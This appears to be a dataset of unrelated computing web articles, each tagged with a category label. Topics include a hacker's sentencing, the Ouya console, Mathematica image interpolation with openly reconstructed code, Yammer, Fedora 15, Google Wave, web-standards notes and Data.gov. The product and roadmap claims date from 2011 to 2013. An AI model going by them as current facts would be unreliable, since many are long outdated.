Jay Leiderman, a Los Angeles attorney with experience representing individuals allegedly part of Anonymous, also thinks the punishment is very extreme:
“Ostensibly they could have locked him up for three years straight and then released him on juvenile parole. But to keep someone off the Internet for six years — that one term seems unduly harsh. You’re talking about a really bright, gifted kid in terms of all things Internet. And at some point after getting on the right path he could do some really good things. I feel that monitored Internet access for six years is a bit on the hefty side. It could sideline his whole life–his career path, his art, his skills. At some level it’s like taking away Mozart’s piano.”
There's no doubt that for Cosmo, a kid who spends most of his days on the Internet, this sentence seems incredibly harsh. Since he's so gifted with hacking and computers, it would be a shame for him to lose his prowess over the next six years without a chance to redeem himself. It wouldn't be surprising if he found a way to sneak online during his probation, but that kind of action wouldn't exactly be advisable: it's clear the FBI is taking his offenses very seriously, and a violation of probation would only fan the flames.
Do you think the sentencing was harsh or appropriate punishment for Cosmo’s misdeeds? | 计算机 |
Aaron Colter
Check out our review of the Ouya Android-based gaming console.
Even after the relatively cheap, Android-based Ouya console proved a massive success on Kickstarter (the console was able to pull in nearly $8.6 million from investors despite having an initial goal of only $960,000), pundits and prospective owners of the new gaming machine loudly wondered how well it would be able to attract developers who would otherwise be making games for the Xbox 360, iPhone or PC. Assuming you believe official statements made by the people behind the Ouya console, there is nothing to worry about on that front.
“Over a thousand” developers have contacted the Ouya creators since the end of their Kickstarter campaign, according to a statement published as part of a recent announcement on who will be filling out the company’s leadership roles now that it is properly established. Likewise, the statement claims that “more than 50” companies “from all around the world” have approached the people behind Ouya to distribute the console once it is ready for its consumer debut at some as-yet-undetermined point in 2013.
While this is undoubtedly good news for anyone who’s been crossing their fingers, hoping that the Ouya can make inroads into the normally insular world of console gaming, it should be noted that while these thousand-plus developers may have attempted to reach the Ouya’s creators, the company offers no solid figures on how many of them are officially committed to bringing games to the platform. That “over a thousand” figure means little if every last developer examined the terms of developing for the Ouya and quickly declined the opportunity in favor of more lucrative options. We have no official information on how these developer conversations actually went, so until we hear a more official assessment of how many gaming firms are solidly pledging support to the Ouya platform, we’ll continue to harbor a bit of cynicism over how successful this machine might possibly be.
As for the aforementioned personnel acquisitions, though they’re less impressive than the possibility that thousands of firms are already tentatively working on games for the Ouya, they should offer a bit more hope that the company making the console will remain stable, guided by people intimately familiar with the gaming biz. According to the announcement, Ouya has attracted former IGN president (and the first investor in the Ouya project) Roy Bahat to serve as chairman of the Ouya board. Additionally, the company has enlisted former EA development director and senior development director for Trion Worlds’ MMO Rift, Steve Chamberlin, to serve as the company’s head of engineering. Finally, Raffi Bagdasarian, former vice president of product development and operations at Sony Pictures Television has been tapped to lead Ouya’s platform service and software product development division. Though you may be unfamiliar with these three men, trust that they’ve all proven their chops as leaders in their respective gaming-centric fields.
Expect to hear more solid information on the Ouya and its games line up as we inch closer to its nebulous 2013 release. Hopefully for the system’s numerous potential buyers, that quip about the massive developer interest the console has attracted proves more tangible than not. | 计算机 |
Convolution is a very powerful image manipulation tool, but it is possible to go much further with Mathematica. We are now going to see how to use the unique combination of symbolic and numerical capabilities of Mathematica to manipulate images in ways impossible in any other system.
The key idea is to transform the image from a discrete matrix of values into a continuous mathematical function, which can then be manipulated mathematically.
Mathematica includes a tremendously clever and powerful feature for doing this. InterpolatingFunction objects, introduced originally to represent the solutions to differential equations, are objects that act just like ordinary functions, but are based on tables of values. The function ListInterpolation takes a list or matrix of numbers, and returns an InterpolatingFunction that can be used to get interpolated values out of the array. (A small annoyance: The Transpose function, which interchanges rows with columns in the matrix, is necessary because, without it, the x and y dimensions of the resulting function would be interchanged, which is inconvenient.)
Let's see how this function works. Say you want to find out the value of a pixel in the image. You could pick out a particular element from the original data using [[ ]] notation. For example, here is the pixel from the 130th row, 40th column.
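The extraction would look like this (puppyData is the assumed name of the raw matrix from the sketch above):

```mathematica
puppyData[[130, 40]]  (* the element in row 130, column 40 *)
```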
Using the InterpolatingFunction, we can get the same value by giving the "function" these same two values as arguments.
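Assuming the transposed definition above, the equivalent call is:

```mathematica
puppyFunction[40, 130]  (* the same pixel, now via the function;
                           the column coordinate comes first *)
```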
So far, nothing remarkable. But the powerful thing about InterpolatingFunctions is that they work even when the arguments are not integers. Using [[ ]] to extract pixels, you can only pick existing pixels. With InterpolatingFunction, you can also pick pseudo pixel values from anywhere in between. For example:
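A sketch of such a call, continuing with the assumed names:

```mathematica
puppyFunction[40.5, 130.25]  (* an interpolated value between pixels *)
```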
Instead of thinking in terms of arrays of pixels, we can now think in terms of a mathematical function (of two variables) that happens to have z-values that correspond to the brightness of patches of our image. So, let's start thinking mathematically. What's the first thing you do with a function of two variables? Why, plot it of course.
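A plausible reconstruction of the lost plotting input; the plot ranges assume a 256-by-192-pixel image:

```mathematica
Plot3D[puppyFunction[x, y], {x, 1, 256}, {y, 1, 192},
 PlotPoints -> 50, Mesh -> False]
```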
Note that the x and y plot ranges correspond to the number of pixels in the original image. This is merely the default used by ListInterpolation. Later we'll see how to rescale the image to more generic ranges of values. For now, we are still recovering from the disappointment caused by this plot. It certainly doesn't look much like a puppy. But, it turns out this is mainly a matter of the viewpoint. Let's try a slightly different one.
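One way to get a nearly top-down viewpoint is shown below; the exact ViewPoint used in the original is unknown, but looking almost straight down makes the brightness read as an image:

```mathematica
Plot3D[puppyFunction[x, y], {x, 1, 256}, {y, 1, 192},
 PlotPoints -> 50, Mesh -> False, ViewPoint -> {0, -0.5, 2}]
```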
Ah, there's the puppy. What happens if we apply a function to the x and y variables before passing them to puppyFunction? This has the effect of changing the spacing at which the original image is sampled, as a function of the x and y coordinates. Perhaps an example will make this clear.
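Here is a sketch of such a distortion, squaring both coordinates and rescaling so the arguments stay inside the original ranges. The specific functions in the lost input are an assumption, though the parabolas in the discussion that follows suggest squaring:

```mathematica
Plot3D[puppyFunction[256 (x/256)^2, 192 (y/192)^2],
 {x, 1, 256}, {y, 1, 192},
 PlotPoints -> 50, Mesh -> False, ViewPoint -> {0, -0.5, 2}]
```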
This diagram may help explain the distortion better.
The parabolas represent the x^2 and y^2 functions we are using to distort the image. Towards the bottom of the image, where the slope is shallow, a small portion of the original image is stretched to fill a large portion of the output image. Near the top, where the slope is steep, the image is instead compressed. The same thing holds in the left/right direction. For example, look at the square at the lower right of the original image. Follow the lines, and you'll see that it turns into a much bigger square in the output image. Conversely, the upper left square, which starts out the same size, turns into a smaller square in the output image. The lower left square turns into a wide rectangle, while the upper right square turns into a tall rectangle.
Before we continue, let's redo the puppyFunction so that its x and y values run over more mathematically sensible ranges (namely, 0 to 1 in the horizontal direction, and the appropriate range in the y direction to keep the coordinate system square).
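ListInterpolation accepts explicit coordinate ranges for this. A minimal sketch, still assuming a 192-by-256 image (so a height/width ratio of 0.75):

```mathematica
aspect = 192/256;  (* height/width ratio of the assumed image size *)
puppyFunction = ListInterpolation[Transpose[puppyData],
  {{0, 1}, {0, aspect}}]
```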
Submission Stats
Register for an RFG Account
Submit Game Additions / Edits
Submit Hardware Additions / Edits
You are either not logged in or not a registered member. In order to submit info to the site you must be a registered memeber and also logged in. If you are a registered member and would like to log in, you can do so via this link. If you are not a registered member and would like to register, please follow this link to register. Please note that there are perks to being logged in, such as the ability to see pending submissions and also the ability to view your submissions log.
Welcome to the RF Generation Submit Info Pages. These pages will allow you to submit info for all of the database entries, and will even allow you to submit entries to add. Use the menu to select the action that you would like to complete. If this is your first time visitng the submit pages I highly suggest that you visit the FAQ page to learn some very important info. I also suggest that you visit the FAQ if you are confused about these pages. Before you're overzealous to your home country
We know that you may or may not know whether or not the game you own is a region wide release, but we'd like for you to make a concerted effort to ensure that the title you are adding really exists. For example, you may live in the US. Therefore, you may think that all your games are US releases, right? Well, they are. But, more often than not, they are also Canadian and Mexican releases, and as such they are a North American Release. For the record, most modern releases in North America are region wide. I can actually look at the back of Mario Kart DS and see that this version of the game was not only authorized to be sold in the US but also Canada, Mexico, and Latin America! As a general rule of thumb, assume, unless you know otherwise, that the title that you are about to submit was a region wide release. Please Read the following regarding image submissions!
We appreciate all submissions that you are willing to give RF Generation, but we need to adhere to certain standards so that there is consistency in our database. As such, please take note that your scans should be 550 pixels on the short side! Your submissions could be rejected if they do not meet these size requirements! Please also note that there are exceptions to this rule, for example, you don't really need a 550 pixel wide scan of a DS or GBA game. Use proper judgement! If you have any questions please contact a staff member, as we are more than willing to help you decipher our standards. We appreciate all submissions that are made, we just want to make sure your submissions are not in vain.
Site content Copyright © rfgeneration.com unless otherwise noted. Oh, and keep it on channel three. | 计算机 |
2015-48/3677/en_head.json.gz/1898 | SharePoint Advancing the enterprise social roadmap
by SharePoint Team, on June 25, 2013February 17, 2015 | 2 Comments | 0
Today’s post comes from Jared Spataro, Senior Director, Microsoft Office Division. Jared leads the SharePoint business, and he works closely with Adam Pisoni and David Sacks on Yammer integration.
To celebrate the one-year anniversary of the Yammer acquisition, I wanted to take a moment to reflect on where we’ve come from and talk about where we’re going. My last post focused on product integration, but this time I want to zoom out and look at the big picture. It has been a busy year, and it’s exciting to see how our vision of “connected experiences” is taking shape.
Yammer momentum
First off, it’s worth noting that Yammer has continued to grow rapidly over the last 12 months–and that’s not something you see every day. Big acquisitions generally slow things down, but in this case we’ve actually seen the opposite. David Sacks provided his perspective in a post on the Microsoft blog, but a few of the high-level numbers bear repeating: over the last year, registered users have increased 55% to almost 8 million, user activity has roughly doubled, and paid networks are up over 200%. All in all, those are pretty impressive stats, and I’m proud of the team and the way the things have gone post-acquisition.
Second, we’ve continued to innovate, testing and iterating our way to product enhancements that are helping people get more done. Over the last year we’ve shipped new features in the standalone service once a week, including:
Message translation. Real-time message translation based on Microsoft Translator. We support translation to 23 languages and can detect and translate from 37 languages.
Inbox. A consolidated view of Yammer messages across conversations you’re following and threads that are most important to you.
File collaboration. Enhancements to the file directory for easy access to recent, followed, and group files- including support for multi-file drag and drop.
Mobile app enhancements. Continual improvements for our mobile apps for iPad, iPhone, Android, and Windows Phone.
Enterprise graph. A dynamically generated map of employees, content and business data based on the Open Graph standard. Using Open Graph, customers can push messages from line of business systems to the Yammer ticker.
Platform enhancements. Embeddable feeds, likes, and follow buttons for integrating Yammer with line of business systems.
In addition to innovation in the standalone product, we’ve also been hard at work on product integration. In my last roadmap update, I highlighted our work with Dynamics CRM and described three phases of broad Office integration: “basic integration, deeper connections, and connected experiences.” Earlier this month, we delivered the first component of “basic integration” by shipping an Office 365 update that lets customers make Yammer the default social network. This summer, we’ll ship a Yammer app in the SharePoint store and publish guidance for integrating Yammer with an on-prem SharePoint 2013 deployment, and this fall we’ll release Office 365 single sign-on, profile picture synchronization, and user experience enhancements.
Finally, even though we’re proud of what we’ve accomplished over the last twelve months, we recognize that we’re really just getting started. “Connected experiences” is our shorthand for saying that social should be an integrated part of the way everyone works together, and over the next year we’ll be introducing innovations designed to make Yammer a mainstream communication tool. Because of the way we develop Yammer, even we don’t know exactly what that will look like. But what we can tell you is that we have an initial set of features we’re working on today, and we’ll test and iterate our way to enhancements that will make working with others easier than ever before. This approach to product roadmap is fairly new for enterprise software, but we’re convinced it’s the only way to lead out in space that is as dynamic and fast-paced as enterprise social. To give you a sense for where we’re headed, here are a few of the projects currently under development over the next 6-8 months:
SharePoint search integration. We’re enabling SharePoint search to search Yammer conversations and setting the stage for deeper, more powerful apps that combine social and search.
Yammer groups in SharePoint sites. The Yammer app in the SharePoint store will allow you to manually replace a SharePoint site feed with a Yammer group feed, but we recognize that many customers will want to do this programmatically. We’re working on settings that will make Yammer feeds the default for all SharePoint sites. (See below for a mock-up of a Yammer group feed surfaced as an out-of-the-box component of a SharePoint team site.)
Yammer messaging enhancements. We’re redesigning the Yammer user experience to make it easier to use as a primary communication tool. We’ll also be improving directed messaging and adding the ability to message multiple groups at once.
Email interoperability. We’re making it easier than ever to use Yammer and email together. You’ll be able to follow an entire thread via email, respond to Yammer messages from email, and participate in conversations across Yammer and email.
External communication. Yammer works great inside an organization, but today you have to create an external network to collaborate with people outside your domain. We’re improving the messaging infrastructure so that you can easily include external parties in Yammer conversations.
Mobile apps. We’ll continue to invest in our iPad, iPhone, Android, Windows Phone 8, and Windows 8 apps as primary access points. The mobile apps are already a great way to use Yammer on the go, and we’ll continue to improve the user experience as we add new features to the service.
Localization. We’re localizing the Yammer interface into new languages to meet growing demand across the world.
It will take some time, and we’ll learn a lot as we go, but every new feature will help define the future–one iteration at a time.
When I take a moment to look at how much has happened over the last year, I’m really proud of the team and all they’ve accomplished. An acquisition can be a big distraction for both sides, but the teams in San Francisco and Redmond have come together and delivered. And as you can see from the list of projects in flight, we’re definitely not resting on our laurels. We’re determined to lead the way forward with rapid innovation, quick-turn iterations, and connected experiences that combine the best of Yammer with the familiar tools of Office. It’s an exciting time, and we hope you’ll join us in our journey.
–Jared Spataro
P.S. As you may have seen, we’ll be hosting the next SharePoint Conference March 3rd through the 6th in Las Vegas. I’m really looking forward to getting the community back together again and hope that you’ll join us there for more details on how we’re delivering on our vision of transforming the way people work together. Look forward to seeing you there!
amagnotta Will the Office 365 release this fall integrate with SharePoint Online? I only see SharePoint 2013 on-prem mentioned. If not, are there plans in the Road Map to integration with SharePoint Online at some point? Thanks.
CorpSec How does Yammer relate to Lync? It seems to me there’s a lot of overlap between the 2 collaboration tools. Will this evolve over time? | 计算机 |
2015-48/3677/en_head.json.gz/7622 | The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases. Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15." manufacturer website
1 dvd for installation on an 86_64 platform back to top | 计算机 |
Jake Ball bought the domain name for ChildrensBookstore.com in 2005, thinking if he only built the site he’d get rich, he says. Six years later, after doing not much with the online store other than selling a handful of kids’ books locally per month, Ball decided he must either get the businesses going or sell the domain and wash his hands of it. He chose to commit. “I was going to get serious about it, put some real capital into this thing and make it into a business,” he says.
Now ChildrensBookstore.com receives 10-12 orders a day and is on track to reach 70 orders a day by the end of the year, which would make the retailer a $1.5 million-per-year business, Ball says. He’s hired three employees to help create content for the site and work on search engine optimization, and enlisted vendors that handle link-building and web development, he says. By the end of the year, he expects he’ll be able to quit his day job and focus solely on e-commerce.
“You can’t nibble at the edges of a competitive market like books,” Ball says. “You won’t get anywhere. You have to jump in with both feet.”
To get started, he says he found a web development company in his hometown of Boise, ID, Tribute Media, to make his site more professional and share some industry expertise. The company suggested he attend the Internet Retailer Conference & Exhibition to learn more, he says, so in June 2012 he flew to Chicago for the event.
When he got there, he says he felt like the country mouse in the children’s fable suddenly introduced to the big city—he’d had no idea about the scope of retailers, vendors, tools and strategies involved in e-commerce. He was exposed to new software available for ChildrensBookstore.com, discovered the meaning of “SEO” and learned how to engage customers and build his business, he says.
Ball hired another Boise-based company that he met at the show, Page One Power, which builds custom links to ChildrensBookstore.com from other web sites relevant to the store and its keywords, such as parenting sites, in order to drive traffic to the retailer and raise its ranking on search engine results pages, he says. Since making those changes, Ball has seen a dramatic uptick in both traffic and sales, he says. “The month-over-month increases are now geometric rather than tiny,” he says. “We’re still at the beginning of this thing, but, if I stay on the path I’m on now, we’ll be a serious business here in not too long—not just some goofy hobby.”
Besides realizing he’d need to make staff and technology investments to build the store, Ball says he learned at IRCE that the key to success in online retail is to provide consumers with something valuable that’s unavailable anywhere else. “You can’t just sell cheaper than others,” he says. To that end, ChildrensBookstore.com now posts daily book reviews written by Ball and his staff, along with articles for parents and teachers about literacy and getting children to read, he says. He also added to the site an Authors section that features favorite authors selected by ChildrensBookstore.com, each with their own page including a biography, interviews and a list of all their books available on the site, Ball says.
“The real goal is to create an experience for parents and teachers with good information about books they want to buy for their kids,” he says. “I kind of knew it, but I didn’t know how to actually do it, like what steps I could take to actually build value for my users.”
Now Ball continually thinks about what features will help his customers and then works with his web developers to add them to the site, he says. “Your project is never done, you just get little milestones and have to move on to the next thing,” he says. “The minute a site is ‘done,’ it starts stalling. If you don’t innovate, you’re toast.”
ChildrensBookstore.com
IRCE
Jake Ball
Page One Power
Tribute Media
web-only retailers
Why the web was my best friend this holiday season Please enable JavaScript to view the comments powered by Disqus. | 计算机 |
2015-48/3677/en_head.json.gz/10685 | Published on O'Reilly (http://oreilly.com/)
An Introduction to Google Wave - Google Wave: Up and Running
by Andres Ferrate
This article provides a general overview of Google Wave that should serve to familiarize you with this new and exciting platform. Keep in mind that Google Wave represents a dynamic technology that has not matured yet, so the look and feel may change in the coming months (maybe even in the coming days!).
This excerpt is from Google Wave: Up and Running. Learn how to build applications with Google Wave, the exciting real-time communication and collaboration platform. This new technology unifies email, instant messaging (IM), wiki, and social networking functions in one integrated interface. With this book, you'll quickly learn how to use Google Wave's APIs to extend the platform and customize its functions and display.
So What Exactly Is Google Wave
Simply stated, Google Wave is a real-time communication and collaboration platform that incorporates several types of web technologies, including email, instant messaging (IM), wiki, online documents, and gadgets. In more technical terms, Google Wave is a platform based on hosted XML documents (called waves) supporting concurrent modifications and low-latency updates.1
Google Wave itself represents a new approach aimed at improving communication and collaboration through the use of a combination of established and emerging web technologies. Google generally describes Google Wave as a platform, and in a broader context, as a set of three interdependent layers:
Product Layer
The Google Wave product is the web application people use to access and edit waves. It's an HTML 5 application, built on Google Web Toolkit. It includes a rich text editor and other functions like desktop drag-and-drop (which, for example, lets you drag a set of photos right into a wave).2 Most people using Google Wave during the public preview will be accessing the product layer. Throughout the remainder of the article I will refer to this product as the Google Wave Client.
Platform Layer
Google Wave can also be considered a platform with a rich set of open APIs that allow developers to embed waves in other web services, and to build new extensions that work inside waves.2
Protocol Layer
The Google Wave protocol is the underlying format for storing and the means of sharing waves, and includes the �live� concurrency control, which allows edits to be reflected instantly across users and services. The protocol is designed for open federation, such that anyone's Wave services can interoperate with each other and with the Google Wave service. To encourage adoption of the protocol, Google has made the code behind Google Wave open source.2
It's important to understand the significance of these three layers. Most people perceive Google Wave in a simplistic way, primarily thinking of Google Wave as a web application.
The reference to Google Wave as a "platform" in general terms (i.e., not in the technical definition of a platform, as stated above) is based more on the lack of other words that can adequately describe something as broad and new as Google Wave. Thus when someone references Google Wave, the connotation may be different, depending on the the user and audience.
The combination of these three layers represents a fairly comprehensive offering that is readily accessible to a large number of users with varying degrees of technical proficiency. Figure 1-2 shows how each layer is represented and the likely audience that will utilize each layer.
Figure 1-2. Each layer in Google Wave has a different representation and a distinct audience. Note that there are interdependencies between the layers, and subsequently, between the intended audience.
It's important to note that Google Wave is the branded name that Google uses to describe the product, platform, and protocol it has developed. However, because the platform layer is externally accessible and the protocol layer is open source, it is likely that third parties will offer products and tools that use names other than "wave" in order to establish new brands and market differentiation. In essence, these third parties will act as wave providers. Keep this in mind as Google Wave gains in popularity and different types of wave providers potentially emerge.
Communication and Collaboration Inside the Browser
Dion Hinchcliffe describes Google Wave as a collaboration and communication mashup that "consists of a dynamic mix of conversation models and highly interactive document creation via the browser." This is an important observation, because the Google Wave client follows a common trend for new applications to operate completely within the browser.
Google Wave's user interface and functionality are created using Google Web Toolkit, which transforms Java code to HTML, CSS, and JavaScript. By leveraging AJAX and the new HTML 5 standard, the Google Wave Client offers a rich set of features and functionality that provide a user experience similar to that of a desktop application.
Figure 1-3 shows how Google Wave displays various types of information using "panes" in a single-page user interface, including an inbox, contacts, navigation, and threaded conversation.
Figure 1-3. The Google Wave user interface includes panes that dynamically update with content as users interact with waves.
What about Riding Waves Outside of Your Browser?
The Google Wave Client interface represents Google's preferred approach for managing the user experience as an application in the web browser. However, Google Wave's APIs and its open source elements (including the network protocol) provide an opportunity for third parties to develop their own user interfaces, including desktop, mobile, and browser-based applications (much in the same way that there are numerous Twitter applications out there).
You can view this the same way as email and the ways in which it is accessed and used via a variety of applications (e.g., I use both Mozilla's Thunderbird desktop application and my browser to access my GMail account, depending on where I am and which computer I am using). It's likely that we will see different desktop and browser applications used to access waves from different wave providers as developers hone their skills with the Google Wave APIs and the network protocol gains in popularity.
Waves, Wavelets, and Blips, Oh My!
Several common terms are used to describe elements relevant to Google Wave. As you become more familiar with the terminology, keep in mind that there is a hierarchy for many core terms; thus, there is a logical line of descendence that you can follow. Some of the more common terms with which you should be familiar include waves, wavelets, blips, robots, and gadgets (see Figure 1-3).
Figure 1-4. A general overview of how a wave is structured. Waves contain wavelets, which are containers for blips (messages) added by participants. Extensions, in the form of robots and gadgets augment the conversation between participants in a wave by adding different types of features and functionality to a conversation.
In general terms, a wave is a container for an enhanced set of threaded conversations that is viewable as a document, consisting of one or more participants (which may include both human participants and robots). The wave is a dynamic entity that contains state and stores historical information. A wave is a living thing, and it is modified in real-time based on participant's actions. A wave contains one or more wavelets defined below.3
Waveletes
A wavelet is a threaded conversation that is spawned within a wave. Wavelets serve as the container for one or more messages, known as blips. The wavelet is the basic unit of access control for data in a particular wave. All participants on a wavelet have read/write access to content within the wavelet. Additionally, all events that occur within the Google Wave APIs operate at the wavelet level or lower.3
A blip is the basic unit of conversation and consists of a single message that appears in a wavelet. Blips may either be drafts or published (by clicking "Done" within the Wave client). Blips manage their content through their document, defined below. Blips may also have other blips as children, forming a blip hierarchy. Each wavelet always consists of at least one root blip.3
Each wave has a set of one or more participants. Participants are either humans or robots (see Robots below) that actively engage and interact in a wave. Participants are added to a wave by existing participants. | 计算机 |
2015-48/3677/en_head.json.gz/12564 | Speaker's Notes for WebWorld Orlando
Whoddathnunkit?
My first exposure to the world-wide web just a little over two years ago was on an obscure internet discussion forum -- alt.hypertext. Today, folks discover the web through Time, Newsweek, and the Wall Street Journal. And when I saw that Burlington Coat Factory had a storefront on the web, I realized that it's no longer just a cool "net.project" -- it's a way of doing business. It's becoming consumer technology
That's what brings us here today -- the promise of a revolutionary new consumer technology. The web is undisputably the hottest technology trend today. But will it last?
Technology trends are like stars -- some never get past the vapor stage. Some grow too fast -- they go supernova and end up as white dwarves -- nice markets -- or black holes -- a danger to anything near them. But my view is that the world-wide web will have a long, healthy life as a pervasive technology. The marriage of distributed hypermedia and the decentralized networking infrastructure of the Internet is evidently just what the times are calling for.
Obviously a lot of people are using the net and the web today. But a whole lot more are sitting on the side of the pool, watching the trade rags, testing the water, and trying to decide if and when to jump in.
In high-tech markets, the web is already cost-effective. Hewlet Packard actually reduced support costs and increased customer satisfaction by delivering more information via the web and less by telephone.
Other web markets are not so mature today. But they're all growing. Various measurements of the size of the Internet and its markets may be all over the scale, but they all show the same trend of exponential growth. Smart business folks realize that even though the web may not be cost-effective today, the cost of playing catch-up tomorrow might kill them.
And clearly, there are large market segments where the producers and the consumers are sitting on opposite sides of a technology gap. They can't find each other in the vastness of the global information space. They can't exchange payments securely and reliably. The data formats limit the expressive capability of the information providers. And in this age of instant gratification, nobody wants to wait for information once they've found it.
This market demand for better web technology has not gone unnoticed. Enter Spyglass. Spry. Netscape. O'Reilly, EIT. And on their heels come IBM, Novell, Microsoft, Lotus, and MCI. Not to mention the legion of consultants, access providers, information providers, digital librarians and editors, and support organizations. And don't forget the internet software development community that brought you Mosaic, USENET News, Internet Relay Chat, and the other ubiquitous applications on the internet.
Believe it or not, that "free software" community is a stabilizing influence on this market frenzy: one thing that draws information providers to the web is the tremendous size of the audience. Depending on any technology that's not royalty-free severely limits the audience.
The result is that while these companies can add value to the web by offering stability, support, and custom applications, it would be self-destructive for them to "splinter off" by failing to interoperate with the mainstream web.
So how do vendors differentiate themselves? Where does innovation fit it? After all, growth of the market depends on confidence in the technology which comes from a blend of the promise of an upgrade path with a proven track record of reliability.
This is the crucial role of interface specifications -- specifications of how various parts of the whole system operate. One way to look at these specifications is to say that they divide the world of all possible behaviours into mandatory, optional, and forbidden behaviours.
For instance, let's take the classic example of the interface between a driver an a car. A spec might say that a car must have a steering wheel, breaks, and accelerator, and it would specify their location relative to the driver. The car may have a clutch and stick shift. The car may not have the driver's seat behind the passenger seat. And there are certain parameters that are open to individual interpretation, like the location of the headlight control. Moreover, some features of the driver/cockpit interface are completely independent of the basic operation of the car -- the stereo controls, for example.
The same is true of web software: some browsers support images. Some don't. Some servers support full-text searching. Some don't. And some offer a "hook" like the CGI interface where searching and other features can be added as an "after-market" option.
We are just now to the point where we have enough experience and shared understanding of the interaction between web software components to submit specifcations to a formal standardization process. There are a few key characteristics of successful specifications that I'd like to discuss, and a few key properties of a standards process that has a proven record of producing them.
First, a specfication must be complete to be successful. If significant aspects are left unspecified, then there is a possibility that independent projects or products will vary in their implementation of those aspects. And Murphy's law says that possibility should be considered a certainty. The result is that two implementations that adhere to everything in the spec do not interoperate. That's pretty much the definition of a specification failure.
On the other hand, you have to be careful not to overspecify an interface. It's a little bit annoying, sometimes, the way different cars have different ways to honk the horn. But if the location of the horn were limited to the traditional middle-of-the-steering-wheel position, where would we put a driver's-side air bag? And I personally think putting the stereo controls in the steering wheel is the best idea since the lightbulb. So we see that minimal specification is key to extensibility and growth.
The last characteristic I'd like to emphasize is modularity. If you can break a large, complex system into two or more smaller, simpler systems, that's the way to go. That way, you can replace one of them in the future without starting from scratch on the others. The HTTP protocol, the HTML data format, and the URL addressing scheme are modular parts of the web technology, for example.
In fact, each of those aspects of the web technology is being standardized somewhat independently. You'll hear more about the HTML, HTTP, and URI working groups in Dave Raggett's presentation on the state of web standards. But I'd like to discuss the Internet Engineering Task Force and the IETF standards process, because it has a proven track-record of creating specification that work.
Standardizing specifications is really just the last step in the overall IETF technology deployment life cycle. First, an idea is proposed, perhaps to a working group chair and then to the group, if it seems appropriate. The proposal is batted around, reviewed, enhanced, or maybe trimmed down. Then the proposal is distributed as an internet draft, perhaps more than once due to review comments. But they don't write the result in stone just because they believe it looks finished. During this review process, members of the group are busy gaining real-world experience by implementing and testing the proposal. Once there are two independent implementations and the working group reaches consensus, the proposal is archived as an RFC -- a request for comments. If it stands the test of some more time, it may become and Internet Standard.
The keys to success in this process are an open process of consensus building, and implementaiton experience concurrent with standardization.
If you think that this seems like a long, tedious process for rolling out new technology, you're not far off. But remember: the target for this effort is lasting, shared technology.
If you want to deploy something new today, then you might be able to skip all that and get right to it. You just have to make sure that the feature you're after can be deployed in your application domain without causing interoperability problems with other domains. This can be a tricky task, given the volatile state of web specs today.
But for example, look at the netscape extensions to HTML. Netscape is catching a certain amount of flak for not sumitting a proposal for public review before deploying them. But I believe they made an honest effor to investigate and avoid interoperability problems. If you add, say, a <blink> tag to a document, it doesn't cause mosaic or any other browsers to behave strangely. So while the netscape extensions violate the letter of the current HTML spec, they do not viloate the spec in spirit.
As a counterexample, we can look back to the introduction of forms in HTML. Information providers that wanted to use forms had to include disclaimers like "look out! If you don't have Mosaic 2.0 or some other forms-capable browser, this page will look funky." There are
mechanisms in the protocol that could have been used to let the software figure that out
without manual intervention.
It's one thing to add features to the system and encourage users to upgrade to software that supports them. It's quite another to carelessly deploy features that makes the installed base of implementations look broken. That forces users to upgrade, and destroys confidence in the technology. Anyone looking at the web as a basis for mission-critical applications will
be watching closely to be sure that enhancements are gracefully deployed. If they see the rules broken too many times, they'll just have to find some other way to get their job done.
So what will be the ultimate fate of the netscape extensions? Will they become standard? I don't know. Some probably will, some probably won't, and some will likely be adopted in modified form. All that will be decided over time in the HTML working group. If you have an interest in seeing it go one way or another, that's the place to make your case. IETF working groups are open to all comers.
(I haven't keyed in the rest of my notes yet.)
Daniel W. Connolly
$Id: speak.html,v 1.1 1997/07/06 06:21:10 connolly Exp $ | 计算机 |
2015-48/3677/en_head.json.gz/13125 | Chrome Tests an Updated New Tab Page
Chromium, the open source version of Google Chrome, includes a more customizable new tab page. You can easily pin, remove and reorder thumbnails without having to enter in the edit mode. Pinned items are always displayed in the new tab page, which now shows only 8 thumbnails, even if they're no longer frequently visited.The list of search engines and the recent bookmarks have been removed and there's a new section of recent activities that includes recently-closed tabs and recent downloads. Another new section is called "recommendations", but it's still a work in progress.You can hide the thumbnails, hide the list of recent activities and the recommendations if you don't find them useful.The updated tab page is not yet ready to be released, but you can enable it if you have a recent Chromium build (Windows, Mac, Linux) by editing the desktop shortcut and adding the following flag in the target field: --new-new-tab-page | 计算机 |
2015-48/3677/en_head.json.gz/13398 | More Topics DataDesignEmerging TechIoTProgrammingWeb Ops & PerformanceWeb Platform We're in the process of moving Radar to the new oreilly.com. Check it out. Print
Listen White House to open source Data.gov as open government data platform
The new "Data.gov in a box" could empower countries to build their own platforms.
by Alex Howard | @digiphile |
| December 5, 2011 Comments: 3
As 2011 comes to an end, there are 28 international open data platforms in the open government community. By the end of 2012, code from new “Data.gov-in-a-box” may help many more countries to stand up their own platforms. A partnership between the United States and India on open government has borne fruit: progress on making the open data platform Data.gov open source. In a post this morning at the WhiteHouse.gov blog, federal CIO Steven VanRoekel (@StevenVDC) and federal CTO Aneesh Chopra (@AneeshChopra) explained more about how Data.gov is going global:
As part of a joint effort by the United States and India to build an open government platform, the U.S. team has deposited open source code — an important benchmark in developing the Open Government Platform that will enable governments around the world to stand up their own open government data sites.
The development is evidence that the U.S. and India are indeed still collaborating on open government together, despite India’s withdrawal from the historic Open Government Partnership (OGP) that launched in September. Chopra and VanRoekel explicitly connected the move to open source Data.gov to the U.S. involvement in the Open Government Partnership today. While we’ll need to see more code and adoption to draw substantive conclusions on the outcomes of this part of the plan, this is clearly progress.
